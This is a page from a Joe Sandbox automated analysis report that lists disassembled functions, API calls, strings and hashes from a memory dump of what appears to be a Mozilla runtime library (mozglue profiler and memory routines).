Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2429186680-2186867486
Opcode ID: 1cfba9b265cb75fc2b18da9a0ea9bb23be61a836fc6b86f7ac0224ddce935b1c
Instruction ID: c05e09a2bfd21403a57e8099f9f0bf26dc08e83155535579e8589b60219e7f40
Opcode Fuzzy Hash: 1cfba9b265cb75fc2b18da9a0ea9bb23be61a836fc6b86f7ac0224ddce935b1c
Instruction Fuzzy Hash: 95B01270604308DBDB106FB8FC0DB093F6DB709B01F000828FB0282241CBB9E1008F61

Uniqueness

Uniqueness Score: -1.00%

Function 6B082272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6B08237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6B082B9C

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 83d74ed608423a43cf4258a56fa78eac7d96a5578eafa848f2500ccff4cccebe
Instruction ID: eb111027687bd90ae56e4c7293bfbf4ad83206aab03196b5dc5203b9f20f849f
Opcode Fuzzy Hash: 83d74ed608423a43cf4258a56fa78eac7d96a5578eafa848f2500ccff4cccebe
Instruction Fuzzy Hash: F2E16B71A002059FDB18CF68C990B9EBFB2BF88314F1981A9E9099B345D775ED85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C9219

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: bdc119f3a0380cbd1bf832e751639e57c741ec68b0586ee922bf49bedd3e8dc4
Instruction ID: 9faed8058ef7663004be080599a135352380917e2368241c4ec9bbbd2158b33a
Opcode Fuzzy Hash: bdc119f3a0380cbd1bf832e751639e57c741ec68b0586ee922bf49bedd3e8dc4
Instruction Fuzzy Hash: 99312131A006058FEB15CF68DC4576F7BEAFF81308F414669D896D7251EB39E805CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B0800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B0838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6B0B084C
EnterCriticalSection.KERNEL32(?), ref: 6B0B08AF
LeaveCriticalSection.KERNEL32(?), ref: 6B0B08BD
LeaveCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B08D5

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 5d3ec408159f6385d40e2354e794bc40e7ff0cd45951783385cec0af3eef92cf
Instruction ID: 0efbd7991533549b9d2d9c1811e29b9d09bfa4ccfab491fb41ead2532ac06277
Opcode Fuzzy Hash: 5d3ec408159f6385d40e2354e794bc40e7ff0cd45951783385cec0af3eef92cf
Instruction Fuzzy Hash: 1921B031B0420D9BEF088F64E845BAE7FB9AF85704F504578D90AA7240EB3AE9058F90

Uniqueness

Uniqueness Score: -1.00%

Function 6B081720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6B0817B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6B0818EE
free.MOZGLUE(?), ref: 6B081911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B08194C

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 9a93e4698238d4d22b7ca15386846ff78c8906caf10ca07d61e188355b48b278
Instruction ID: 2742f48eef4685811ea61db35efd692b2cf2108f38a5ac0609872179e61f0ad1
Opcode Fuzzy Hash: 9a93e4698238d4d22b7ca15386846ff78c8906caf10ca07d61e188355b48b278
Instruction Fuzzy Hash: 10819170A10225DFCB08CF68D8956AEBFB6FF8D310F04456CE861A7354DB34A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6B0D7250
EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B0D7277
__aulldiv.LIBCMT ref: 6B0D72C4
LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B0D72F7

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 7297b65aab39067e1f6f802a7d5810c52ac7f0fab9136f1e65e7b9a0bd6678a9
Instruction ID: e417a951f4bb41488bebdf23cdaaa02b6f4e6e044542e0d6b35af293edc9191f
Opcode Fuzzy Hash: 7297b65aab39067e1f6f802a7d5810c52ac7f0fab9136f1e65e7b9a0bd6678a9
Instruction Fuzzy Hash: 63512E71E012198FCF08CFA8D891ABEBFBABB89304F158619DC15A7750DB35A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BE390 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0BE3E4
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6B0BE4AB

Part of subcall function 6B085D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6B0BD2DA,00000001), ref: 6B085D66

ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE4F5
GetCurrentThreadId.KERNEL32 ref: 6B0BE577
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE584
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE5DE
memset.VCRUNTIME140(?,00000000,00000000), ref: 6B0BE6DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6B0BE864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BE883
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6B0BE8A6

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6B0BE777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6B0BE722, 6B0BE750, 6B0BE7A2
MOZ_PROFILER_STARTUP, xrefs: 6B0BE5A1, 6B0BE5CC, 6B0BE5FF, 6B0BE62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6B0BE655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6B0BE826, 6B0BE850

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 905598890-53385798
Opcode ID: 3ecc6e2f7910b12813c59cdbf4fb14bffc71628d707f6b3af367d606af3c0880
Instruction ID: c83ed8f506cc807f07f24fcebe41b8e523c676edadc073635434af5329852b09
Opcode Fuzzy Hash: 3ecc6e2f7910b12813c59cdbf4fb14bffc71628d707f6b3af367d606af3c0880
Instruction Fuzzy Hash: 69416674A0060ADFCB18CF28D490BAABFB5FF4A304F0045ADD95A9B781D779E851CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CDAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6B0CDB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6B0CDC0E
free.MOZGLUE(?), ref: 6B0CDC2E
free.MOZGLUE(?), ref: 6B0CDC40

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: a31319a05854ecf8a5075ef733d16944a776d0f1130fbb10dd69d95fd27235ae
Instruction ID: 5a2f7b3a574b703440b7ed5b683be4978a20f2ae68d097a7449e05c9b6f5139c
Opcode Fuzzy Hash: a31319a05854ecf8a5075ef733d16944a776d0f1130fbb10dd69d95fd27235ae
Instruction Fuzzy Hash: FF4163796007009FC718DF38C498B5FBBE6BF88254F44896DE89A87351EB39E840CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CA2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6B0CA315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6B0CA31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6B0CA36A

Part of subcall function 6B095E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6B095EDB
Part of subcall function 6B095E90: memset.VCRUNTIME140(ewk,000000E5,?), ref: 6B095F27
Part of subcall function 6B095E90: LeaveCriticalSection.KERNEL32(?), ref: 6B095FB2

Part of subcall function 6B0C2140: free.MOZGLUE(?,00000060,?,6B0C7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0C215D

free.MOZGLUE(00000000), ref: 6B0CA37C

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: babf1411ae41f345a4a65f9e784bf2c3237b085b90530807aff16df5d87f52d6
Instruction ID: 9b4707a3b774c3cf07b18649c0ef3f02f73084c9e0a5169daf1228dc1a62541d
Opcode Fuzzy Hash: babf1411ae41f345a4a65f9e784bf2c3237b085b90530807aff16df5d87f52d6
Instruction Fuzzy Hash: B321C275A002249FCB199F1AD850B9FBFA9FF86754F544055EE095B300DB3AED02C6D2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C1B80 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0C1B98
AcquireSRWLockExclusive.KERNEL32(?,?,6B0C1D96,00000000), ref: 6B0C1BA1
ReleaseSRWLockExclusive.KERNEL32(?,?,6B0C1D96,00000000), ref: 6B0C1BB5
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0C1C25

Part of subcall function 6B0C1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6B0C759E,?,?), ref: 6B0C1CB4

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
String ID:
API String ID: 3699359333-0
Opcode ID: a173e27d8fdc283e9157ce82841291c89b19cbd7a23b31e9dc5a3345a033ac46
Instruction ID: 0d813294a754f25611680f7e724f9e42cbe90d1f80a7ae14f2ebd11ebe495d0f
Opcode Fuzzy Hash: a173e27d8fdc283e9157ce82841291c89b19cbd7a23b31e9dc5a3345a033ac46
Instruction Fuzzy Hash: 5321D070A002289BDB089F26C8C57AFBFF9AF46B84F40445DE9165B242D77DE801CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D7B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6B0D7B51
__aulldiv.LIBCMT ref: 6B0D7B6C
__aulldiv.LIBCMT ref: 6B0D7B8B
__aulldiv.LIBCMT ref: 6B0D7BB1

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: da1e84c9d1531dbe1376615bd06d55ce7cd8bbe694992bef83f248010f878b37
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: 1F214F71B006095FD724CFBDCC82E677BE8EB85714B118A3DE11AD7251E674A8008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D7A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6B08BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6B0D7A3F), ref: 6B08BF11
Part of subcall function 6B08BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6B0D7A3F), ref: 6B08BF5D
Part of subcall function 6B08BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6B0D7A3F), ref: 6B08BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6B0D7A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6B0D7A7A

Part of subcall function 6B089830: free.MOZGLUE(?,?,?,6B0D7ABE), ref: 6B08985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6B0D7AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6B0D7AC8

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: ec0d46005f4b0d75d76b5b8eb0bf7cfdc1ffa6d54aac1124b106af42af3f6a76
Instruction ID: 428ebea4e56b0e47f1b74902560739680150c8c21a442bd38d2b34da2f5ab076
Opcode Fuzzy Hash: ec0d46005f4b0d75d76b5b8eb0bf7cfdc1ffa6d54aac1124b106af42af3f6a76
Instruction Fuzzy Hash: E02130356043049FCB18DF28E899A9EBFE5FF89314F04481DE94687355DB34E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D7930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6B08BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6B0D7A3F), ref: 6B08BF11
Part of subcall function 6B08BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6B0D7A3F), ref: 6B08BF5D
Part of subcall function 6B08BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6B0D7A3F), ref: 6B08BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6B0D7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6B0DA264,6B0DA264), ref: 6B0D799A

Part of subcall function 6B089830: free.MOZGLUE(?,?,?,6B0D7ABE), ref: 6B08985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6B0D79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6B0D79E8

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 2660d0d2ef24719961757095adc698d589c0963dbe843bcee1daf38744824a83
Instruction ID: 0a2c0d8162b4a0831a37d2d457ff14d71a46686fcb8b869be6722e12f3eb72fc
Opcode Fuzzy Hash: 2660d0d2ef24719961757095adc698d589c0963dbe843bcee1daf38744824a83
Instruction Fuzzy Hash: 1C2130356043049FCB18DF28D889A9EBFE5FF89354F04881DE94687355DB34E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DAAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0DAAF8
EnterCriticalSection.KERNEL32(6B0FF770,?,6B09BF9F), ref: 6B0DAB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6B09BF9F), ref: 6B0DAB39
LeaveCriticalSection.KERNEL32(6B0FF770,?,?,?,?,?,?,?,?,6B09BF9F), ref: 6B0DAB6B

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: 76747bf957bc97bfbfd771efffda946c7847f1d8db024eb0d1178372bd970531
Instruction ID: a23d060e9a32eb2157bacc95acde43a4d58971cd06afbef99e9efa034cb0c475
Opcode Fuzzy Hash: 76747bf957bc97bfbfd771efffda946c7847f1d8db024eb0d1178372bd970531
Instruction Fuzzy Hash: 281130B5A012099FCF04DFA8E88599FBFB9FF493147044429E90697301E734E909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C2050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0C205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6B0C201B,?,?,?,?,?,?,?,6B0C1F8F,?,?), ref: 6B0C2064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0C208E
free.MOZGLUE(?,?,?,00000000,?,6B0C201B,?,?,?,?,?,?,?,6B0C1F8F,?,?), ref: 6B0C20A3

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: dae0cc821ce540d514bdf3673ebae4d4d88d2985aad95548ff4cdad3926330f8
Instruction ID: 5961d438abe32d4ec2a903902fe01ff949f4eefa1387869ac33348155be6d165
Opcode Fuzzy Hash: dae0cc821ce540d514bdf3673ebae4d4d88d2985aad95548ff4cdad3926330f8
Instruction Fuzzy Hash: 47F0B4751007009BC7159F16E88471BBFF9EF86324F10001AE90787711DB76E801CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BEB00 Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0BEB11
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6B0BEB3C
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEB5B
GetCurrentThreadId.KERNEL32 ref: 6B0BEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6B0BEBAC
GetCurrentThreadId.KERNEL32 ref: 6B0BEBC1
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8,?,?,00000000), ref: 6B0BEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6B0BEBE5
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8,00000000), ref: 6B0BEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6B0BEC46
CloseHandle.KERNEL32(?), ref: 6B0BEC55
free.MOZGLUE(00000000), ref: 6B0BEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6B0BEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6B0BEA9B

Memory Dump Source

